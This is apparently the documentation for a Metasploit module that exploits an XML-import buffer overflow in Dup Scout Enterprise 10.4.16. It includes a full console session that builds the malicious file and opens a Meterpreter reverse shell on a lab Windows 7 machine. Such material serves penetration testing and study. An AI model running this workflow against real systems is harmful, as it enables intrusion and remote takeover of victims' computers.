This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16 by using the import command option to import a specially crafted xml file. ## Vulnerable Application This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [www.dupscout.com](http://www.dupscout.com/setups/dupscoutent_setup_v10.4.16.exe). ## Verification Steps 1. Start msfconsole 2. Do: `exploit/windows/fileformat/dupscout_xml` 3. Do: `set PAYLOAD [PAYLOAD]` 4. Do: `run` ## Example ``` msf > use exploit/windows/fileformat/dupscout_xml msf exploit(windows/fileformat/dupscout_xml) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(windows/fileformat/dupscout_xml) > set LHOST 172.16.40.146 LHOST => 172.16.40.146 msf exploit(windows/fileformat/dupscout_xml) > run [*] Creating 'msf.xml' file ... [+] msf.xml stored at /root/.msf4/local/msf.xml msf exploit(windows/fileformat/dupscout_xml) > use exploit/multi/handler msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set LHOST 172.16.40.146 LHOST => 172.16.40.146 msf exploit(multi/handler) > run [*] Started reverse TCP handler on 172.16.40.146:4444 [*] Sending stage (179779 bytes) to 172.16.40.144 [*] Meterpreter session 1 opened (172.16.40.146:4444 -> 172.16.40.144:49790) at 2018-01-24 20:56:56 +0000 meterpreter > sysinfo Computer : PC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x86 System Language : pt_PT Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows meterpreter > ```